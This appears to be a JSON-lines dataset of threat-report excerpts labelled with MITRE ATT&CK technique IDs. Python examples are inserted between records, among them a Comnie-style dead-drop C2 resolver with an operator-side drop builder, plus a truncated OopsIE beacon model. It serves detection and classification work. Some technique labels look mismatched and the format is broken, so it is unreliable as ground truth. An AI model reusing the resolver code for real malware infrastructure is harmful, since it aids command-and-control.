{"text1":"An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network. These observations come from system log data, CrowdStrike Falcon\u00ae sensor telemetry, and the output of the Falcon Forensic Collector (a customized version of CrowdStrike\u2019s freely distributed community tool, CrowdResponse","labels":"['T1570']"}
|
|
{"text1":"As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain","labels":"['T1003.002', 'T1003.004', 'T1003.001']"}
|
|
{"text1":"Displays and modifies entries in the Address Resolution Protocol (ARP) cache, which contains one or more tables that are used to store IP addresses and their resolved Ethernet or Token Ring physical addresses. Used without parameters, arp displays help","labels":"['T1018']"}
|
|
{"text1":"We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders","labels":"['T1078.002']"}
|
|
{"text1":"KillDisk is designed to run with high privileges; this time it registers itself as a service under the Plug-And-Play Support name","labels":"['T1036.004']"}
|
|
{"text1":"Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below","labels":"['T1204.001']"}
|
|
{"text1":"The attackers also used a malicious tool that they named BCS-server. This tool allows them to open a tunnel into an internal network and then this tunnel can be used to send and receive data between the C&C server and even non-infected computers in the network. The main idea of this tool is based on the same principles as the XTUNNEL malware used by the Sednit group","labels":"['T1140']"}
|
|
{"text1":"The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe","labels":"['T1204.001']"}
|
|
{"text1":"The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file \/bin\/pwd\u2019, which may have achieved two objectives for APT41. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step","labels":"['T1083']"}
|
|
{"text1":"Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker\u2019s C&C servers","labels":"['T1560']"}
|
|
{"text1":"HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5","labels":"['T1071.001']"}
|
|
{"text1":"PowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as C&C server","labels":"['T1102.002']"}
|
|
{"text1":"26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe","labels":"['T1140']"}
|
|
{"text1":"For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors, Windows Defender ATP provides rich, visualized technical context. In the screenshots below, Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk (Figure 5), loads the DLL using rundll32 (Figure 6), sets the DLL as a service (Figure 7), and saves a copy of itself in C:\\Windows\\Help (Figure 8","labels":"['T1218.011']"}
|
|
{"text1":"It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\\Software\\ registry path","labels":"['T1518.001']"}
|
|
{"text1":"Earth Vetala used spearphishing emails with embedded links to a legitimate file-sharing service to distribute their malicious package","labels":"['T1583.006']"}
|
|
{"text1":"Emails dating more than three years prior to malware execution have been included in the collected EmailStorage folder, meaning that there may not be a date limit for the email enumerator. There is a lack of keywords or other limiting pattern by which specific email messages in local mailboxes were targeted for exfiltration. Kroll has identified instances where specific email messages were deleted within the EmailStorage folder. In some instances, the entire EmailStorage folder is deleted once messages have all been exfiltrated. Based on observed cases, there was no evidence that attachments were included in the collected data. Kroll collaborators at the National Cyber Forensics Training Alliance (NCFTA) observed Qakbot samples sending SMTP traffic indicative of outbound spam thread hijackings","labels":"['T1074.001']"}
|
|
{"text1":"The experience of dealing with Emotet shows that it will be time well spent. We always recommend that clients adopt a policy that forces users to create passwords that they can remember, but that are hard to guess","labels":"['T1110.001']"}
|
|
{"text1":"In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique","labels":"['T1568']"}
|
|
{"text1":"When run, GoldMax decodes (Base64) and decrypts (AES-256) the configuration data to reveal a custom data structure comprised of the following dynamically generated and hardcoded values (delimited by","labels":"['T1140']"}
|
|
{"text1":"The first stage logic is performed by \u2018mklgsecondary\u2019 which serves the purpose of downloading a file named \u2018chrome.txt\u2019 from a C2 server using the BITS utility. The downloader modifies the Chrome shortcut using the same method previously described for the Telegram variant. The downloaded PE file (\u2018chrome.txt\u2019\/\u2019mklgchrome\u2019) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload","labels":"['T1197', 'T1105']"}
|
|
{"text1":"In the implementation of Flagpro v1.0, if a dialog titled \u201cWindows \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u201d is displayed when Flagpro accesses an external site, Flagpro automatically clicks the OK button to close the dialog. This handling also works when the dialog is written in Chinese or English. It can indicate that the targets are Japan, Taiwan, and English-speaking countries. As an additional feature, Flagpro v2.0 checks whether both the username and password fields in the dialog are filled in before clicking the OK button","labels":"['T1614.001']"}
|
|
{"text1":"Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site","labels":"['T1566.002']"}
|
|
{"text1":"Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup","labels":"['T1053.005', 'T1218.010']"}
|
|
{"text1":"Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim\u2019s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine\u2019s %APPDATA% directory. The built-in Windows utility rundll32.exe is then used to load this DLL by the original .lnk file. Unit 42 has observed a total of two variants of Comnie. One of the ways the variants differ is in how they obtain their command and control (C2) information. Both variants make use of third-party online services in an attempt to prevent DNS based blocking of their first stage communications. In older variants, Comnie was found to look for the \u2018++a++\u2019 markers. The example C2s used by older variants of Comnie demonstrates this","labels":"['T1102.002']"}
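A dead-drop resolver of the kind the Comnie paragraph describes, written as an added example for this page (it is not Comnie's code and does not reproduce its format). It pulls the text between '++a++' markers out of a page hosted on a third-party service and recovers a C2 address from it. Everything beyond the marker string is an assumption: that the marked text is Base64 of an RC4-encrypted host:port string, that the RC4 key is a fixed string, and that the page content is handed to the resolver by the caller (here a constructed sample), so nothing is fetched from the network.

```python
"""Added example, not Comnie's code: a dead-drop resolver that extracts the
text between '++a++' markers from a page on a third-party service and decodes
a C2 address from it.

Assumptions (not stated in the excerpt above): the marked text is Base64 of an
RC4-encrypted "host:port" string; the RC4 key is a fixed string; the page body
is supplied by the caller, so nothing is fetched from the network.
"""
import base64
import re
from typing import List, Tuple

MARKER = "++a++"
MARKER_RE = re.compile(re.escape(MARKER) + r"(.*?)" + re.escape(MARKER), re.S)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_marked(page: str) -> List[str]:
    """Return every blob enclosed between a pair of markers, in page order."""
    return [m.strip() for m in MARKER_RE.findall(page)]


def resolve_c2(page: str, key: bytes) -> List[Tuple[str, int]]:
    """Decode each marked blob to (host, port); malformed blobs are skipped."""
    found = []
    for blob in extract_marked(page):
        try:
            plain = rc4(key, base64.b64decode(blob)).decode("ascii")
            host, port = plain.rsplit(":", 1)
            found.append((host, int(port)))
        except ValueError:  # bad Base64, non-ASCII, no ':' or non-numeric port
            continue
    return found


def make_drop(page_template: str, key: bytes, host: str, port: int) -> str:
    """Build a dead-drop page the way the operator's side would (sample data only)."""
    blob = base64.b64encode(rc4(key, f"{host}:{port}".encode("ascii"))).decode("ascii")
    return page_template.replace("{DROP}", f"{MARKER}{blob}{MARKER}")


if __name__ == "__main__":
    KEY = b"example-key"  # hypothetical; a real key would be recovered from the sample
    page = make_drop("<p>Nothing to see here.</p><!-- {DROP} -->", KEY, "203.0.113.10", 443)
    print(resolve_c2(page, KEY))
```

The point of the marker search is that the rest of the page is noise the resolver never has to understand; a detection that keys on the marker string in outbound-fetched content, rather than on the hosting domain, survives the operator moving the drop to another service.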
|
|
{"text1":"To inject the OpenSSH server configuration directly into memory, Ebury parses the sshd binary\u2019s code section mapped in the same process looking for two different functions. If it fails, it downgrades security features by disabling SELinux Role-Based Access Control and deactivating PAM modules. When one of the functions is successfully resolved, Ebury will use this when the backdoor is used to tamper with sshd\u2018s configuration","labels":"['T1556.003', 'T1562.001']"}
|
|
{"text1":"The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206","labels":"['T1105']"}
|
|
{"text1":"In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload. Commands in the macro are heavily obfuscated for defense evasion","labels":"['T1027']"}
|
|
{"text1":"Icons were often folders, meant to trick targets into thinking they were opening a shortcut to a folder","labels":"['T1036']"}
|
|
{"text1":"The main code is run in a separate thread: every 10 minutes, the application contacts the C&C server motivation[.]neighboring[.]site and passes it the computer's identifier in the User-Agent string. The identifier is a SuperFastHash of the system volume serial number and the name of the computer","labels":"['T1082', 'T1029']"}
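Reproducing the kind of host identifier the excerpt above describes (a SuperFastHash over the volume serial number and computer name, sent in the User-Agent) lets an analyst tie a beacon in proxy logs to a specific host. The block below is an added example for this page, not the malware's code. The hash is Paul Hsieh's reference SuperFastHash; everything else is assumed because the excerpt does not say: that the input is the serial rendered as eight uppercase hex digits followed directly by the computer name as ASCII, that the identifier is rendered as eight lowercase hex digits, and the proxy log format, which is constructed here.

```python
"""Added example, not the malware's code: rebuilding a SuperFastHash-based host
identifier so that beacons in proxy logs can be matched to a host under
investigation.

Assumptions (not stated in the excerpt): the hash is Paul Hsieh's reference
SuperFastHash; its input is the volume serial as eight uppercase hex digits
followed by the computer name, ASCII-encoded; the identifier is rendered as
eight lowercase hex digits. The log lines below are constructed.
"""
import re
from typing import List

M32 = 0xFFFFFFFF


def _signed(b: int) -> int:
    """Mimic C's (signed char) cast used by the reference implementation."""
    return b - 256 if b > 127 else b


def _u16(data: bytes, pos: int) -> int:
    return int.from_bytes(data[pos:pos + 2], "little")


def superfasthash(data: bytes) -> int:
    """Paul Hsieh's 32-bit SuperFastHash with little-endian 16-bit reads."""
    n = len(data)
    if n == 0:
        return 0
    h = n
    rem = n & 3
    pos = 0
    for _ in range(n >> 2):  # main loop, four bytes per round
        h = (h + _u16(data, pos)) & M32
        tmp = ((_u16(data, pos + 2) << 11) ^ h) & M32
        h = ((h << 16) ^ tmp) & M32
        pos += 4
        h = (h + (h >> 11)) & M32
    if rem == 3:  # tail handling for the 1..3 leftover bytes
        h = (h + _u16(data, pos)) & M32
        h ^= (h << 16) & M32
        h ^= (_signed(data[pos + 2]) << 18) & M32
        h = (h + (h >> 11)) & M32
    elif rem == 2:
        h = (h + _u16(data, pos)) & M32
        h ^= (h << 11) & M32
        h = (h + (h >> 17)) & M32
    elif rem == 1:
        h = (h + _signed(data[pos])) & M32
        h ^= (h << 10) & M32
        h = (h + (h >> 1)) & M32
    # final avalanche
    h ^= (h << 3) & M32
    h = (h + (h >> 5)) & M32
    h ^= (h << 4) & M32
    h = (h + (h >> 17)) & M32
    h ^= (h << 25) & M32
    h = (h + (h >> 6)) & M32
    return h


def host_id(volume_serial: int, computer_name: str) -> str:
    """Identifier for one host under the assumed input layout (hypothetical)."""
    raw = f"{volume_serial:08X}{computer_name}".encode("ascii")
    return f"{superfasthash(raw):08x}"


# Constructed proxy log format: the User-Agent is the last quoted field.
UA_RE = re.compile(r'"([0-9a-f]{8})"\s*$')


def lines_for_host(log_lines: List[str], volume_serial: int, computer_name: str) -> List[str]:
    """Return the log lines whose User-Agent carries this host's identifier."""
    wanted = host_id(volume_serial, computer_name)
    hits = []
    for line in log_lines:
        m = UA_RE.search(line)
        if m and m.group(1) == wanted:
            hits.append(line)
    return hits


SAMPLE_LOG = [  # constructed, not real telemetry
    '2022-03-01T10:00:00Z 10.0.0.5 GET http://motivation[.]neighboring[.]site/ "'
    + host_id(0x1234ABCD, "WS-FINANCE-07") + '"',
    '2022-03-01T10:00:02Z 10.0.0.9 GET http://motivation[.]neighboring[.]site/ "deadbeef"',
]

if __name__ == "__main__":
    for hit in lines_for_host(SAMPLE_LOG, 0x1234ABCD, "WS-FINANCE-07"):
        print(hit)
```

If the real sample concatenates the two values in a different order or encoding, only `host_id` changes; confirm the layout against the binary before trusting a match, since a 32-bit identifier gives no way to reverse the lookup.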
|
|
{"text1":"One significant change between DEATHRANSOM and FIVEHANDS is the use of a memory-only dropper, which upon execution, expects a command line switch of -key followed by the key value necessary to perform decryption of its payload. The payload is stored and encrypted with AES-128 using an IV of \u201c85471kayecaxaubv\u201d. The decrypted FIVEHANDS payload is immediately executed after decryption. To date, Mandiant has only observed encrypted droppers with a common imphash of 8517cf209c905e801241690648f36a97","labels":"['T1140']"}
|
|
{"text1":"Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. Figure 5 below shows a high-level execution flow of the QakBot loader","labels":"['T1518.001', 'T1497.001']"}
|
|
{"text1":"NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system\u2019s IP-to-physical-address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods","labels":"['T1210']"}
|
|
{"text1":"Tracing the origin of the hidden .mina file showed that it is a copy of an included resource, renamed SubMenu.nib, from the application bundle and where the main backdoor functions were contained. It also has the same links to Lazarus\u2019 Windows and Linux predecessors: the presence of the hardcoded strings c_2910.cls and k_3872.cls. Both strings were previously used during C&C communication to the domain thevagabondsatchel[.]com as the sample storage of the cybercriminal group, as reported by 360 Netlab researchers","labels":"['T1027', 'T1564.001']"}
|
|
{"text1":"The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to look like a PDF","labels":"['T1218.007']"}
|
|
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting","labels":"['T1059.005']"}
|
|
{"text1":"The name of the local computer that corresponds to the IP address and the name of the port is shown unless the -n parameter is specified. If the port is not yet established, the port number is shown as an asterisk (*). Foreign Address The IP address and port number of the remote computer to which the socket is connected. If the port is not yet established, the port number is shown as an asterisk (*). (state) Indicates the state of a TCP connection. The possible states are as follows: CLOSE_WAIT CLOSED ESTABLISHED FIN_WAIT_1 FIN_WAIT_2 LAST_ACK LISTEN SYN_RECEIVED SYN_SEND TIMED_WAIT For more information about the states of a TCP connection, see RFC 793. Proto The name of the protocol (TCP or UDP). - Local Address The IP address of the local computer and the port number being used. The name of the local computer that corresponds to the IP address and the name of the port is shown unless the -n parameter is specified. If the port is not yet established, the port number is shown as an asterisk (*). - Foreign Address The IP address and port number of the remote computer to which the socket is connected. If the port is not yet established, the port number is shown as an asterisk (*). - This command is available only if the Internet Protocol (TCP\/IP) protocol is installed as a component in the properties of a network adapter in Network Connections","labels":"['T1049']"}
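The netstat column layout described in the record above is what an analyst parses when reviewing T1049 activity on a host. The following is an added example, not code from the page or from any of the quoted reports: it parses `netstat -ano`-style output (the sample output is constructed) into records, handles the `*` placeholder for not-yet-established ports and bracketed IPv6 addresses, and lists ESTABLISHED TCP sessions whose peer is outside loopback, RFC 1918 and link-local space. The internal-network list is an assumption the reader should adjust for their environment.

```python
"""Parse Windows `netstat -ano` output and flag established sessions to
non-internal peers. Added example; the sample output below is constructed."""
import ipaddress
from collections import Counter

# Constructed sample of what `netstat -ano` prints on a Windows host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    10.0.0.5:49711         10.0.0.9:445           ESTABLISHED     4
  TCP    10.0.0.5:49820         203.0.113.7:1985       ESTABLISHED     5120
  TCP    10.0.0.5:49823         198.51.100.2:443       TIME_WAIT       0
  TCP    127.0.0.1:49670        127.0.0.1:49671        ESTABLISHED     3388
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                    1844
"""

# Assumed list of address space treated as "internal"; tune per environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]


def _split_endpoint(endpoint):
    """'host:port' -> (host, port). port is None when netstat prints '*'
    (port not yet established); IPv6 hosts lose their square brackets."""
    host, _, port = endpoint.rpartition(":")
    host = host.strip("[]")
    return host, (None if port == "*" else int(port))


def parse_netstat(text):
    """Turn the table into dicts. UDP rows carry no State column."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # header, blank line, or 'Active Connections'
        proto, local, foreign = parts[0], parts[1], parts[2]
        if proto == "TCP":
            state, pid = parts[3], int(parts[4])
        else:
            state, pid = None, int(parts[3])
        lhost, lport = _split_endpoint(local)
        fhost, fport = _split_endpoint(foreign)
        records.append({"proto": proto, "local_host": lhost, "local_port": lport,
                        "foreign_host": fhost, "foreign_port": fport,
                        "state": state, "pid": pid})
    return records


def is_internal(host):
    """True for loopback/RFC 1918/link-local peers, and for '*' or names
    that cannot be judged as an external endpoint."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return any(ip in net for net in INTERNAL_NETS)


def state_counts(records):
    """Distribution of TCP states, useful as a quick baseline per host."""
    return Counter(r["state"] for r in records if r["state"])


def external_established(records):
    """(pid, peer, port) for ESTABLISHED TCP sessions to non-internal peers:
    the rows to triage first when hunting for a beaconing process."""
    return [(r["pid"], r["foreign_host"], r["foreign_port"])
            for r in records
            if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"
            and not is_internal(r["foreign_host"])]


if __name__ == "__main__":
    recs = parse_netstat(SAMPLE_NETSTAT)
    print(dict(state_counts(recs)))
    for pid, host, port in external_established(recs):
        print(f"PID {pid} -> {host}:{port}")
```

Note that `ipaddress`'s own `is_private` also covers the documentation ranges (203.0.113.0/24 and friends), so an explicit internal list is used rather than relying on it; otherwise test-net peers would silently disappear from the output.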
|
|
{"text1":"The most common ports used are, 80, 1985, 1986, and 443. 1985 is the default port for the malware, 1986 is the lazy variation of that port. Port 80 and 443 are the default ports for HTTP and HTTPS traffic. The next most common is port 53. This is used in some of the newer 3.22 and 3.39 samples. After that, the count for each port starts declining sharply","labels":"['T1571']"}
|
|
{"text1":"In previous iterations, the Astaroth Trojan campaign used certutil to download files. In this iteration, they have replaced certutil with BITSAdmin","labels":"['T1105']"}
|
|
{"text1":"Then, it encrypts it with 3DES before sending it (figure 28). The _P.Y (\"0295A. 1618C\") method in figure 26 creates the MD5 hash of the string. This hash is used as secret for the 3DES encryption","labels":"['T1560']"}
|
|
{"text1":"This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors. The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. LockHeed Recruitment Lure . The macro uses aliases to rename the APIs that it uses (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command. Additional vendors have also identified a variant that uses pcalua.exe. Additional vendors have reported on the current campaign while attributing it to Lazarus. Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign","labels":"['T1059.003']"}
|
|
{"text1":"Afterwards, the persistence file will be created in \/Library\/LaunchDaemons\/ or ~\/Library\/LaunchAgents\/ folder. This persistence file is also set to hidden with a randomly generated file date and time","labels":"['T1543.004', 'T1543.001']"}
|
|
{"text1":"Extract the encoded payload. Decrypt the extracted payload. This uses the AES algorithm in CBC mode. Decompress the decrypted payload. This uses the LZMA algorithm. Decrypt the decompressed payload. This is simple XOR with byte key and as such does not impact compression ratio. Execute the decrypted payload as shellcode","labels":"['T1027', 'T1140']"}
|
|
{"text1":"This function will either bind the calling process to a port or has the calling process connect to a remote host. The function is called in the following manner","labels":"['T1134.002']"}
|
|
{"text1":"The attachment itself is an Microsoft Excel XLS document that contains malicious macro script. The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros. Notably, all of the content text is accessible to the victim even before macros are enabled. However, a white font color is applied to the text to make it appear that the victim must enable macros to access the content. Once the macro is enabled, the content is presented via the following code: ActiveSheet.Range(\"a1:c54\").Font.Color = vbBlack The code above changes the font color to black within the specified cell range and presents the content to the user. On initial inspection, the content appears to be the expected legitimate content, however, closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document. Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs","labels":"['T1204.002']"}
|
|
{"text1":"This sample was delivered by a malicious document named \u201cInterview with a north Korean defector\u201d. The macro embedded inside unpacks and executes winload.exe","labels":"['T1204.002']"}
|
|
{"text1":"Falcon Intelligence has observed two different methods used to deploy BitPaymer once the domain controllers are compromised. In one instance, only the domain controllers and other critical infrastructure, like payroll servers, were targeted and PowerShell Empire was used to download and execute the BitPaymer malware directly on these servers","labels":"['T1059.001']"}
|
|
{"text1":"WIRTE used documents deploying Visual Basic Script (VBS), potentially delivered through spear phishing, decoys with Arabic content, occasionally associated with Palestinian matters","labels":"['T1059.005']"}
|
|
{"text1":"Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections","labels":"['T1571']"}
|
|
{"text1":"Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration","labels":"['T1057', 'T1007']"}
|
|
{"text1":"The downloaded Stage3 is written in C# as in Stage2, and an obfuscation tool called Eazfuscator is detected by exeinfoPE","labels":"['T1027']"}
|
|
{"text1":"The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. According to Group-IB researchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry. The contents of the file \"install.bat\" from APT41's This is Not a Test campaign","labels":"['T1547.001']"}
|
|
{"text1":"Among infostealers used by the Kimsuky group, some samples have been found that use FTP to download additional malware after logging infected targets to the C&C [14, 15","labels":"['T1059.007', 'T1071.002']"}
|
|
{"text1":"Multiple trojanized updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website, including","labels":"['T1553.002']"}
|
|
{"text1":"Win32CmDll.dll first tries to inject the ManagerMain and GuardClient modules into a process with one of the following names: lsass.exe, wininit.exe or lsm.exe. If that fails, it tries to inject into one of the registered windows services processes, excluding processes named spoolsv.exe, ekrn.exe (ESET), avp.exe (Kaspersky) or dllhost.exe. As a last option, if everything else failed, it tries to use the processes taskhost.exe, taskhostw.exe or explorer.exe","labels":"['T1055.001']"}
|
|
{"text1":"We have most definitely observed Kimsuky targeting specific individuals \u2014 in fact, up to the present moment \u2014 even going as far as registering Internet domains containing the individual targets' names, the PwC analyst said","labels":"['T1583.001']"}
|
|
{"text1":"Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk","labels":"['T1105']"}
|
|
{"text1":"In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from \/.ssh\/config, .bash_history, \/.ssh\/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets","labels":"['T1018']"}
|
|
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName\/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what. hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are","labels":"['T1059.003']"}
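The two OopsIE records above (this one and the earlier one ending at the srvCheckresponded.tmp step) describe one beacon cycle: GET http://<c2 domain>/chk, accept only if the server echoes hex(UserName/MachineName), then GET /what, exit on "Oops", otherwise split "[command]<>[hex params]". Below is an added example that models that exchange end to end; it is not code from the page or from the Unit 42 analysis. Assumptions: the identifier is the UTF-8 bytes of "user/machine" as lowercase hex (the report only says "hex"), the command name "cmd" is invented because the page's command list is cut off, the InternetExplorer COM transport is replaced by an in-memory stub server, and the empty-file side effect is reported as a status instead of being written to disk.

```python
"""Model of the OopsIE /chk -> /what beacon cycle. Added example with a stub
C2; identifier encoding and the command name are assumptions."""
import binascii


def beacon_id(user, machine):
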